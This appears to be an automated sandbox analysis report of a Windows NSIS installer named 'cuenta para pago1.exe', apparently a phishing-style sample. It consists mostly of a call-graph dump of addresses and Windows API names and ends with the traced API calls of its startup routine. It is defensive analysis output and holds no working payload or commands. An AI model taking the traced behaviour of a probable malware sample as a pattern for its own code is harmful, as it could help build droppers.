5426 100016f3 5425->5426 5427 100016ff 5425->5427 5428 10001272 2 API calls 5426->5428 5429 10001726 5427->5429 5430 10001709 5427->5430 5438 100016fd 5428->5438 5432 10001750 5429->5432 5433 1000172c 5429->5433 5431 1000153d 3 API calls 5430->5431 5436 1000170e 5431->5436 5435 1000153d 3 API calls 5432->5435 5434 100015b4 3 API calls 5433->5434 5437 10001731 5434->5437 5435->5438 5439 100015b4 3 API calls 5436->5439 5440 10001272 2 API calls 5437->5440 5441 10001714 5439->5441 5442 10001737 GlobalFree 5440->5442 5443 10001272 2 API calls 5441->5443 5442->5438 5444 1000174b GlobalFree 5442->5444 5445 1000171a GlobalFree 5443->5445 5444->5438 5445->5438 5446 10002238 5447 10002296 5446->5447 5448 100022cc 5446->5448 5447->5448 5449 100022a8 GlobalAlloc 5447->5449 5449->5447 5450 404579 5451 4045a5 5450->5451 5452 4045b6 5450->5452 5511 405743 GetDlgItemTextW 5451->5511 5453 4045c2 GetDlgItem 5452->5453 5486 404621 5452->5486 5456 4045d6 5453->5456 5455 4045b0 5458 4062ae 5 API calls 5455->5458 5459 4045ea SetWindowTextW 5456->5459 5463 405a79 4 API calls 5456->5463 5457 404705 5460 4048b4 5457->5460 5513 405743 GetDlgItemTextW 5457->5513 5458->5452 5464 4040de 19 API calls 5459->5464 5462 404145 8 API calls 5460->5462 5467 4048c8 5462->5467 5468 4045e0 5463->5468 5469 404606 5464->5469 5465 40603c 18 API calls 5470 404695 SHBrowseForFolderW 5465->5470 5466 404735 5471 405ad6 18 API calls 5466->5471 5468->5459 5475 4059ce 3 API calls 5468->5475 5472 4040de 19 API calls 5469->5472 5470->5457 5473 4046ad CoTaskMemFree 5470->5473 5474 40473b 5471->5474 5476 404614 5472->5476 5477 4059ce 3 API calls 5473->5477 5514 40601a lstrcpynW 5474->5514 5475->5459 5512 404113 SendMessageW 5476->5512 5479 4046ba 5477->5479 5482 4046f1 SetDlgItemTextW 5479->5482 5487 40603c 18 API calls 5479->5487 5481 40461a 5484 4063f4 5 API calls 5481->5484 5482->5457 5483 404752 5485 4063f4 5 API calls 5483->5485 5484->5486 5494 404759 5485->5494 5486->5457 5486->5460 5486->5465 5488 4046d9 lstrcmpiW 5487->5488 5488->5482 5490 4046ea lstrcatW 5488->5490 5489 40479a 5515 40601a lstrcpynW 5489->5515 5490->5482 5492 4047a1 5493 405a79 4 API calls 5492->5493 5495 4047a7 GetDiskFreeSpaceW 5493->5495 5494->5489 5498 405a1a 2 API calls 5494->5498 5500 4047f2 5494->5500 5497 4047cb MulDiv 5495->5497 5495->5500 5497->5500 5498->5494 5499 404863 5502 404886 5499->5502 5504 40140b 2 API calls 5499->5504 5500->5499 5501 4049fe 21 API calls 5500->5501 5503 404850 5501->5503 5516 404100 KiUserCallbackDispatcher 5502->5516 5505 404865 SetDlgItemTextW 5503->5505 5506 404855 5503->5506 5504->5502 5505->5499 5508 404935 21 API calls 5506->5508 5508->5499 5509 4048a2 5509->5460 5517 40450e 5509->5517 5511->5455 5512->5481 5513->5466 5514->5483 5515->5492 5516->5509 5518 404521 SendMessageW 5517->5518 5519 40451c 5517->5519 5518->5460 5519->5518 5520 401cfa GetDlgItem GetClientRect 5521 402bbf 18 API calls 5520->5521 5522 401d2c LoadImageW SendMessageW 5521->5522 5523 401d4a DeleteObject 5522->5523 5524 402a4c 5522->5524 5523->5524 5019 40237b 5020 402381 5019->5020 5021 402bbf 18 API calls 5020->5021 5022 402393 5021->5022 5023 402bbf 18 API calls 5022->5023 5024 40239d RegCreateKeyExW 5023->5024 5025 4023c7 5024->5025 5035 40281e 5024->5035 5026 402bbf 18 API calls 5025->5026 5027 4023e2 5025->5027 5028 4023d8 lstrlenW 5026->5028 5029 402ba2 18 API calls 5027->5029 5031 4023ee 5027->5031 5028->5027 5029->5031 5030 402409 RegSetValueExW 5033 40241f RegCloseKey 5030->5033 5031->5030 5032 403027 36 API calls 5031->5032 5032->5030 5033->5035 5036 4027fb 5037 402bbf 18 API calls 5036->5037 5038 402802 FindFirstFileW 5037->5038 5039 40282a 5038->5039 5043 402815 5038->5043 5040 402833 5039->5040 5044 405f61 wsprintfW 5039->5044 5045 40601a lstrcpynW 5040->5045 5044->5040 5045->5043 5525 40427b 5526 404293 5525->5526 5530 4043ad 5525->5530 5531 4040de 19 API calls 5526->5531 5527 404417 5528 4044e9 5527->5528 5529 404421 GetDlgItem 5527->5529 5536 404145 8 API calls 5528->5536 5532 4044aa 5529->5532 5533 40443b 5529->5533 5530->5527 5530->5528 5534 4043e8 GetDlgItem SendMessageW 5530->5534 5535 4042fa 5531->5535 5532->5528 5537 4044bc 5532->5537 5533->5532 5541 404461 6 API calls 5533->5541 5556 404100 KiUserCallbackDispatcher 5534->5556 5539 4040de 19 API calls 5535->5539 5540 4044e4 5536->5540 5542 4044d2 5537->5542 5543 4044c2 SendMessageW 5537->5543 5545 404307 CheckDlgButton 5539->5545 5541->5532 5542->5540 5546 4044d8 SendMessageW 5542->5546 5543->5542 5544 404412 5547 40450e SendMessageW 5544->5547 5554 404100 KiUserCallbackDispatcher 5545->5554 5546->5540 5547->5527 5549 404325 GetDlgItem 5555 404113 SendMessageW 5549->5555 5551 40433b SendMessageW 5552 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5551->5552 5553 404358 GetSysColor 5551->5553 5552->5540 5553->5552 5554->5549 5555->5551 5556->5544 5557 1000103d 5558 1000101b 5 API calls 5557->5558 5559 10001056 5558->5559 5560 4014ff 5561 401507 5560->5561 5563 40151a 5560->5563 5562 402ba2 18 API calls 5561->5562 5562->5563 5564 401000 5565 401037 BeginPaint GetClientRect 5564->5565 5566 40100c DefWindowProcW 5564->5566 5568 4010f3 5565->5568 5569 401179 5566->5569 5570 401073 CreateBrushIndirect FillRect DeleteObject 5568->5570 5571 4010fc 5568->5571 5570->5568 5572 401102 CreateFontIndirectW 5571->5572 5573 401167 EndPaint 5571->5573 5572->5573 5574 401112 6 API calls 5572->5574 5573->5569 5574->5573 5582 401904 5583 40193b 5582->5583 5584 402bbf 18 API calls 5583->5584 5585 401940 5584->5585 5586 40580b 69 API calls 5585->5586 5587 401949 5586->5587 5588 402d04 5589 402d16 SetTimer 5588->5589 5591 402d2f 5588->5591 5589->5591 5590 402d84 5591->5590 5592 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5591->5592 5592->5590 4302 403c06 4303 403d59 4302->4303 4304 403c1e 4302->4304 4306 403daa 4303->4306 4307 403d6a GetDlgItem GetDlgItem 4303->4307 4304->4303 4305 403c2a 4304->4305 4308 403c35 SetWindowPos 4305->4308 4309 403c48 4305->4309 4311 403e04 4306->4311 4320 401389 2 API calls 4306->4320 4310 4040de 19 API calls 4307->4310 4308->4309 4313 403c65 4309->4313 4314 403c4d ShowWindow 4309->4314 4315 403d94 SetClassLongW 4310->4315 4316 403d54 4311->4316 4372 40412a 4311->4372 4317 403c87 4313->4317 4318 403c6d DestroyWindow 4313->4318 4314->4313 4319 40140b 2 API calls 4315->4319 4322 403c8c SetWindowLongW 4317->4322 4323 403c9d 4317->4323 4321 404067 4318->4321 4319->4306 4324 403ddc 4320->4324 4321->4316 4331 404098 ShowWindow 4321->4331 4322->4316 4327 403d46 4323->4327 4328 403ca9 GetDlgItem 4323->4328 4324->4311 4329 403de0 SendMessageW 4324->4329 4325 40140b 2 API calls 4342 403e16 4325->4342 4326 404069 DestroyWindow EndDialog 4326->4321 4391 404145 4327->4391 4332 403cd9 4328->4332 4333 403cbc SendMessageW IsWindowEnabled 4328->4333 4329->4316 4331->4316 4335 403ce6 4332->4335 4336 403d2d SendMessageW 4332->4336 4337 403cf9 4332->4337 4346 403cde 4332->4346 4333->4316 4333->4332 4334 40603c 18 API calls 4334->4342 4335->4336 4335->4346 4336->4327 4339 403d01 4337->4339 4340 403d16 4337->4340 4385 40140b 4339->4385 4344 40140b 2 API calls 4340->4344 4341 403d14 4341->4327 4342->4316 4342->4325 4342->4326 4342->4334 4345 4040de 19 API calls 4342->4345 4363 403fa9 DestroyWindow 4342->4363 4375 4040de 4342->4375 4347 403d1d 4344->4347 4345->4342 4388 4040b7 4346->4388 4347->4327 4347->4346 4349 403e91 GetDlgItem 4350 403ea6 4349->4350 4351 403eae ShowWindow KiUserCallbackDispatcher 4349->4351 4350->4351 4378 404100 KiUserCallbackDispatcher 4351->4378 4353 403ed8 EnableWindow 4356 403eec 4353->4356 4354 403ef1 GetSystemMenu EnableMenuItem SendMessageW 4355 403f21 SendMessageW 4354->4355 4354->4356 4355->4356 4356->4354 4379 404113 SendMessageW 4356->4379 4380 40601a lstrcpynW 4356->4380 4359 403f4f lstrlenW 4360 40603c 18 API calls 4359->4360 4361 403f65 SetWindowTextW 4360->4361 4381 401389 4361->4381 4363->4321 4364 403fc3 CreateDialogParamW 4363->4364 4364->4321 4365 403ff6 4364->4365 4366 4040de 19 API calls 4365->4366 4367 404001 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4366->4367 4368 401389 2 API calls 4367->4368 4369 404047 4368->4369 4369->4316 4370 40404f ShowWindow 4369->4370 4371 40412a SendMessageW 4370->4371 4371->4321 4373 404142 4372->4373 4374 404133 SendMessageW 4372->4374 4373->4342 4374->4373 4376 40603c 18 API calls 4375->4376 4377 4040e9 SetDlgItemTextW 4376->4377 4377->4349 4378->4353 4379->4356 4380->4359 4383 401390 4381->4383 4382 4013fe 4382->4342 4383->4382 4384 4013cb MulDiv SendMessageW 4383->4384 4384->4383 4386 401389 2 API calls 4385->4386 4387 401420 4386->4387 4387->4346 4389 4040c4 SendMessageW 4388->4389 4390 4040be 4388->4390 4389->4341 4390->4389 4392 40415d GetWindowLongW 4391->4392 4402 4041e6 4391->4402 4393 40416e 4392->4393 4392->4402 4394 404180 4393->4394 4395 40417d GetSysColor 4393->4395 4396 404190 SetBkMode 4394->4396 4397 404186 SetTextColor 4394->4397 4395->4394 4398 4041a8 GetSysColor 4396->4398 4399 4041ae 4396->4399 4397->4396 4398->4399 4400 4041b5 SetBkColor 4399->4400 4401 4041bf 4399->4401 4400->4401 4401->4402 4403 4041d2 DeleteObject 4401->4403 4404 4041d9 CreateBrushIndirect 4401->4404 4402->4316 4403->4404 4404->4402 4405 402786 4406 40278d 4405->4406 4412 4029f7 4405->4412 4407 402ba2 18 API calls 4406->4407 4408 402798 4407->4408 4409 40279f SetFilePointer 4408->4409 4410 4027af 4409->4410 4409->4412 4413 405f61 wsprintfW 4410->4413 4413->4412 4501 100027c7 4502 10002817 4501->4502 4503 100027d7 VirtualProtect 4501->4503 4503->4502 5593 401907 5594 402bbf 18 API calls 5593->5594 5595 40190e 5594->5595 5596 40575f MessageBoxIndirectW 5595->5596 5597 401917 5596->5597 5598 401e08 5599 402bbf 18 API calls 5598->5599 5600 401e0e 5599->5600 5601 402bbf 18 API calls 5600->5601 5602 401e17 5601->5602 5603 402bbf 18 API calls 5602->5603 5604 401e20 5603->5604 5605 402bbf 18 API calls 5604->5605 5606 401e29 5605->5606 5607 401423 25 API calls 5606->5607 5608 401e30 ShellExecuteW 5607->5608 5609 401e61 5608->5609 5615 1000164f 5616 10001516 GlobalFree 5615->5616 5618 10001667 5616->5618 5617 100016ad GlobalFree 5618->5617 5619 10001682 5618->5619 5620 10001699 VirtualFree 5618->5620 5619->5617 5620->5617 5621 401491 5622 405179 25 API calls 5621->5622 5623 401498 5622->5623 5624 401a15 5625 402bbf 18 API calls 5624->5625 5626 401a1e ExpandEnvironmentStringsW 5625->5626 5627 401a32 5626->5627 5629 401a45 5626->5629 5628 401a37 lstrcmpW 5627->5628 5627->5629 5628->5629 5630 402515 5631 402bbf 18 API calls 5630->5631 5632 40251c 5631->5632 5635 405bef GetFileAttributesW CreateFileW 5632->5635 5634 402528 5635->5634 5636 402095 5637 402bbf 18 API calls 5636->5637 5638 40209c 5637->5638 5639 402bbf 18 API calls 5638->5639 5640 4020a6 5639->5640 5641 402bbf 18 API calls 5640->5641 5642 4020b0 5641->5642 5643 402bbf 18 API calls 5642->5643 5644 4020ba 5643->5644 5645 402bbf 18 API calls 5644->5645 5647 4020c4 5645->5647 5646 402103 CoCreateInstance 5651 402122 5646->5651 5647->5646 5648 402bbf 18 API calls 5647->5648 5648->5646 5649 401423 25 API calls 5650 4021e1 5649->5650 5651->5649 5651->5650 5652 401b16 5653 402bbf 18 API calls 5652->5653 5654 401b1d 5653->5654 5655 402ba2 18 API calls 5654->5655 5656 401b26 wsprintfW 5655->5656 5657 402a4c 5656->5657 5665 10001058 5667 10001074 5665->5667 5666 100010dd 5667->5666 5668 10001092 5667->5668 5669 10001516 GlobalFree 5667->5669 5670 10001516 GlobalFree 5668->5670 5669->5668 5671 100010a2 5670->5671 5672 100010b2 5671->5672 5673 100010a9 GlobalSize 5671->5673 5674 100010b6 GlobalAlloc 5672->5674 5675 100010c7 5672->5675 5673->5672 5676 1000153d 3 API calls 5674->5676 5677 100010d2 GlobalFree 5675->5677 5676->5675 5677->5666 5685 40159b 5686 402bbf 18 API calls 5685->5686 5687 4015a2 SetFileAttributesW 5686->5687 5688 4015b4 5687->5688 5054 40229d 5055 4022a5 5054->5055 5057 4022ab 5054->5057 5056 402bbf 18 API calls 5055->5056 5056->5057 5058 402bbf 18 API calls 5057->5058 5061 4022b9 5057->5061 5058->5061 5059 402bbf 18 API calls 5062 4022c7 5059->5062 5060 402bbf 18 API calls 5063 4022d0 WritePrivateProfileStringW 5060->5063 5061->5059 5061->5062 5062->5060 5689 401f1d 5690 402bbf 18 API calls 5689->5690 5691 401f24 5690->5691 5692 4063f4 5 API calls 5691->5692 5693 401f33 5692->5693 5694 401f4f GlobalAlloc 5693->5694 5697 401fb7 5693->5697 5695 401f63 5694->5695 5694->5697 5696 4063f4 5 API calls 5695->5696 5698 401f6a 5696->5698 5699 4063f4 5 API calls 5698->5699 5700 401f74 5699->5700 5700->5697 5704 405f61 wsprintfW 5700->5704 5702 401fa9 5705 405f61 wsprintfW 5702->5705 5704->5702 5705->5697 5706 40149e 5707 402288 5706->5707 5708 4014ac PostQuitMessage 5706->5708 5708->5707 5709 40249e 5710 402cc9 19 API calls 5709->5710 5711 4024a8 5710->5711 5712 402ba2 18 API calls 5711->5712 5713 4024b1 5712->5713 5714 4024d5 RegEnumValueW 5713->5714 5715 4024c9 RegEnumKeyW 5713->5715 5717 40281e 5713->5717 5716 4024ee RegCloseKey 5714->5716 5714->5717 5715->5716 5716->5717 5064 40231f 5065 402324 5064->5065 5066 40234f 5064->5066 5067 402cc9 19 API calls 5065->5067 5068 402bbf 18 API calls 5066->5068 5069 40232b 5067->5069 5070 402356 5068->5070 5071 402335 5069->5071 5075 40236c 5069->5075 5076 402bff RegOpenKeyExW 5070->5076 5072 402bbf 18 API calls 5071->5072 5073 40233c RegDeleteValueW RegCloseKey 5072->5073 5073->5075 5077 402c93 5076->5077 5078 402c2a 5076->5078 5077->5075 5079 402c50 RegEnumKeyW 5078->5079 5080 402c62 RegCloseKey 5078->5080 5082 402c87 RegCloseKey 5078->5082 5083 402bff 5 API calls 5078->5083 5079->5078 5079->5080 5081 4063f4 5 API calls 5080->5081 5084 402c72 5081->5084 5085 402c76 5082->5085 5083->5078 5084->5085 5086 402ca2 RegDeleteKeyW 5084->5086 5085->5077 5086->5085 5726 403821 5727 40382c 5726->5727 5728 403830 5727->5728 5729 403833 GlobalAlloc 5727->5729 5729->5728 5730 100010e1 5731 10001111 5730->5731 5732 100011d8 GlobalFree 5731->5732 5733 100012ba 2 API calls 5731->5733 5734 100011d3 5731->5734 5735 10001272 2 API calls 5731->5735 5736 10001164 GlobalAlloc 5731->5736 5737 100011f8 GlobalFree 5731->5737 5738 100012e1 lstrcpyW 5731->5738 5739 100011c4 GlobalFree 5731->5739 5733->5731 5734->5732 5735->5739 5736->5731 5737->5731 5738->5731 5739->5731 5740 401ca3 5741 402ba2 18 API calls 5740->5741 5742 401ca9 IsWindow 5741->5742 5743 401a05 5742->5743 5744 402a27 SendMessageW 5745 402a41 InvalidateRect 5744->5745 5746 402a4c 5744->5746 5745->5746 4875 40242a 4886 402cc9 4875->4886 4877 402434 4878 402bbf 18 API calls 4877->4878 4879 40243d 4878->4879 4880 402448 RegQueryValueExW 4879->4880 4885 40281e 4879->4885 4881 40246e RegCloseKey 4880->4881 4882 402468 4880->4882 4881->4885 4882->4881 4890 405f61 wsprintfW 4882->4890 4887 402bbf 18 API calls 4886->4887 4888 402ce2 4887->4888 4889 402cf0 RegOpenKeyExW 4888->4889 4889->4877 4890->4881 5747 40422c lstrlenW 5748 40424b 5747->5748 5749 40424d WideCharToMultiByte 5747->5749 5748->5749 4896 40172d 4897 402bbf 18 API calls 4896->4897 4898 401734 SearchPathW 4897->4898 4899 40174f 4898->4899 5757 404532 5758 404542 5757->5758 5759 404568 5757->5759 5760 4040de 19 API calls 5758->5760 5761 404145 8 API calls 5759->5761 5762 40454f SetDlgItemTextW 5760->5762 5763 404574 5761->5763 5762->5759 5764 4027b4 5765 4027ba 5764->5765 5766 4027c2 FindClose 5765->5766 5767 402a4c 5765->5767 5766->5767 4920 401b37 4921 401b88 4920->4921 4923 401b44 4920->4923 4922 401bb2 GlobalAlloc 4921->4922 4924 401b8d 4921->4924 4925 40603c 18 API calls 4922->4925 4927 401b5b 4923->4927 4929 401bcd 4923->4929 4935 402288 4924->4935 4941 40601a lstrcpynW 4924->4941 4925->4929 4926 40603c 18 API calls 4930 402282 4926->4930 4939 40601a lstrcpynW 4927->4939 4929->4926 4929->4935 4934 40575f MessageBoxIndirectW 4930->4934 4932 401b9f GlobalFree 4932->4935 4933 401b6a 4940 40601a lstrcpynW 4933->4940 4934->4935 4937 401b79 4942 40601a lstrcpynW 4937->4942 4939->4933 4940->4937 4941->4932 4942->4935 5768 402537 5769 402562 5768->5769 5770 40254b 5768->5770 5772 402596 5769->5772 5773 402567 5769->5773 5771 402ba2 18 API calls 5770->5771 5778 402552 5771->5778 5775 402bbf 18 API calls 5772->5775 5774 402bbf 18 API calls 5773->5774 5776 40256e WideCharToMultiByte lstrlenA 5774->5776 5777 40259d lstrlenW 5775->5777 5776->5778 5777->5778 5779 4025ca 5778->5779 5780 4025e0 5778->5780 5782 405cd0 5 API calls 5778->5782 5779->5780 5781 405ca1 WriteFile 5779->5781 5781->5780 5782->5779 4943 4052b8 4944 405462 4943->4944 4945 4052d9 GetDlgItem GetDlgItem GetDlgItem 4943->4945 4947 405493 4944->4947 4948 40546b GetDlgItem CreateThread CloseHandle 4944->4948 4989 404113 SendMessageW 4945->4989 4950 4054be 4947->4950 4953 4054e3 4947->4953 4954 4054aa ShowWindow ShowWindow 4947->4954 4948->4947 4992 40524c 5 API calls 4948->4992 4949 405349 4958 405350 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4949->4958 4951 4054ca 4950->4951 4952 40551e 4950->4952 4955 4054d2 4951->4955 4956 4054f8 ShowWindow 4951->4956 4952->4953 4965 40552c SendMessageW 4952->4965 4957 404145 8 API calls 4953->4957 4991 404113 SendMessageW 4954->4991 4960 4040b7 SendMessageW 4955->4960 4961 405518 4956->4961 4962 40550a 4956->4962 4970 4054f1 4957->4970 4963 4053a2 SendMessageW SendMessageW 4958->4963 4964 4053be 4958->4964 4960->4953 4967 4040b7 SendMessageW 4961->4967 4966 405179 25 API calls 4962->4966 4963->4964 4968 4053d1 4964->4968 4969 4053c3 SendMessageW 4964->4969 4965->4970 4971 405545 CreatePopupMenu 4965->4971 4966->4961 4967->4952 4972 4040de 19 API calls 4968->4972 4969->4968 4973 40603c 18 API calls 4971->4973 4975 4053e1 4972->4975 4974 405555 AppendMenuW 4973->4974 4976 405572 GetWindowRect 4974->4976 4977 405585 TrackPopupMenu 4974->4977 4978 4053ea ShowWindow 4975->4978 4979 40541e GetDlgItem SendMessageW 4975->4979 4976->4977 4977->4970 4980 4055a0 4977->4980 4981 405400 ShowWindow 4978->4981 4982 40540d 4978->4982 4979->4970 4983 405445 SendMessageW SendMessageW 4979->4983 4984 4055bc SendMessageW 4980->4984 4981->4982 4990 404113 SendMessageW 4982->4990 4983->4970 4984->4984 4985 4055d9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4984->4985 4987 4055fe SendMessageW 4985->4987 4987->4987 4988 405627 GlobalUnlock SetClipboardData CloseClipboard 4987->4988 4988->4970 4989->4949 4990->4979 4991->4950 5783 4014b8 5784 4014be 5783->5784 5785 401389 2 API calls 5784->5785 5786 4014c6 5785->5786 4999 4015b9 5000 402bbf 18 API calls 4999->5000 5001 4015c0 5000->5001 5002 405a79 4 API calls 5001->5002 5014 4015c9 5002->5014 5003 401629 5005 40165b 5003->5005 5006 40162e 5003->5006 5004 4059fb CharNextW 5004->5014 5008 401423 25 API calls 5005->5008 5007 401423 25 API calls 5006->5007 5009 401635 5007->5009 5016 401653 5008->5016 5018 40601a lstrcpynW 5009->5018 5010 4056c5 2 API calls 5010->5014 5012 401642 SetCurrentDirectoryW 5012->5016 5013 4056e2 5 API calls 5013->5014 5014->5003 5014->5004 5014->5010 5014->5013 5015 40160f GetFileAttributesW 5014->5015 5017 405648 4 API calls 5014->5017 5015->5014 5017->5014 5018->5012 5787 40293b 5788 402ba2 18 API calls 5787->5788 5789 402941 5788->5789 5790 402964 5789->5790 5791 40297d 5789->5791 5799 40281e 5789->5799 5794 402969 5790->5794 5795 40297a 5790->5795 5792 402993 5791->5792 5793 402987 5791->5793 5797 40603c 18 API calls 5792->5797 5796 402ba2 18 API calls 5793->5796 5801 40601a lstrcpynW 5794->5801 5802 405f61 wsprintfW 5795->5802 5796->5799 5797->5799 5801->5799 5802->5799 5803 10002a7f 5804 10002a97 5803->5804 5805 1000158f 2 API calls 5804->5805 5806 10002ab2 5805->5806

                                                                                      Executed Functions

                                                                                      Function 0040326A Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 401stringfilecomCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 40326a-40329d SetErrorMode GetVersion 1 4032b0 0->1 2 40329f-4032a7 call 4063f4 0->2 4 4032b5-4032c9 call 406384 lstrlenA 1->4 2->1 7 4032a9 2->7 9 4032cb-40333f call 4063f4 * 2 #17 OleInitialize SHGetFileInfoW call 40601a GetCommandLineW call 40601a GetModuleHandleW 4->9 7->1 18 403341-403348 9->18 19 403349-403363 call 4059fb CharNextW 9->19 18->19 22 403369-40336f 19->22 23 40347a-403494 GetTempPathW call 403239 19->23 25 403371-403376 22->25 26 403378-40337c 22->26 30 403496-4034b4 GetWindowsDirectoryW lstrcatW call 403239 23->30 31 4034ec-403506 DeleteFileW call 402dee 23->31 25->25 25->26 28 403383-403387 26->28 29 40337e-403382 26->29 32 403446-403453 call 4059fb 28->32 33 40338d-403393 28->33 29->28 30->31 48 4034b6-4034e6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403239 30->48 51 4035b7-4035c7 call 403789 OleUninitialize 31->51 52 40350c-403512 31->52 49 403455-403456 32->49 50 403457-40345d 32->50 37 403395-40339d 33->37 38 4033ae-4033e7 33->38 44 4033a4 37->44 45 40339f-4033a2 37->45 39 403404-40343e 38->39 40 4033e9-4033ee 38->40 39->32 47 403440-403444 39->47 40->39 46 4033f0-4033f8 40->46 44->38 45->38 45->44 54 4033fa-4033fd 46->54 55 4033ff 46->55 47->32 56 403465-403473 call 40601a 47->56 48->31 48->51 49->50 50->22 58 403463 50->58 67 4036ed-4036f3 51->67 68 4035cd-4035dd call 40575f ExitProcess 51->68 59 4035a7-4035ae call 403863 52->59 60 403518-403523 call 4059fb 52->60 54->39 54->55 55->39 63 403478 56->63 58->63 70 4035b3 59->70 74 403571-40357b 60->74 75 403525-40355a 60->75 63->23 72 403771-403779 67->72 73 4036f5-40370b GetCurrentProcess OpenProcessToken 67->73 70->51 77 40377b 72->77 78 40377f-403783 ExitProcess 72->78 82 403741-40374f call 4063f4 73->82 83 40370d-40373b LookupPrivilegeValueW AdjustTokenPrivileges 73->83 80 4035e3-4035f7 call 4056e2 lstrcatW 74->80 81 40357d-40358b call 405ad6 74->81 76 40355c-403560 75->76 84 403562-403567 76->84 85 403569-40356d 76->85 77->78 94 403604-40361e lstrcatW lstrcmpiW 80->94 95 4035f9-4035ff lstrcatW 80->95 81->51 93 40358d-4035a3 call 40601a * 2 81->93 96 403751-40375b 82->96 97 40375d-403768 ExitWindowsEx 82->97 83->82 84->85 89 40356f 84->89 85->76 85->89 89->74 93->59 94->51 100 403620-403623 94->100 95->94 96->97 98 40376a-40376c call 40140b 96->98 97->72 97->98 98->72 103 403625-40362a call 405648 100->103 104 40362c call 4056c5 100->104 109 403631-40363f SetCurrentDirectoryW 103->109 104->109 112 403641-403647 call 40601a 109->112 113 40364c-403675 call 40601a 109->113 112->113 117 40367a-403696 call 40603c DeleteFileW 113->117 120 4036d7-4036df 117->120 121 403698-4036a8 CopyFileW 117->121 120->117 122 4036e1-4036e8 call 405ebb 120->122 121->120 123 4036aa-4036ca call 405ebb call 40603c call 4056fa 121->123 122->51 123->120 132 4036cc-4036d3 CloseHandle 123->132 132->120
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 0040328D
                                                                                      • GetVersion.KERNEL32 ref: 00403293
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000), ref: 0040332A
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\cuenta para pago1.exe",00000020), ref: 00403351
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000,?), ref: 00403616
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\cuenta para pago1.exe,0041FEA8,?), ref: 004036A0
                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.4057716866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057793008.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.4057835590.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
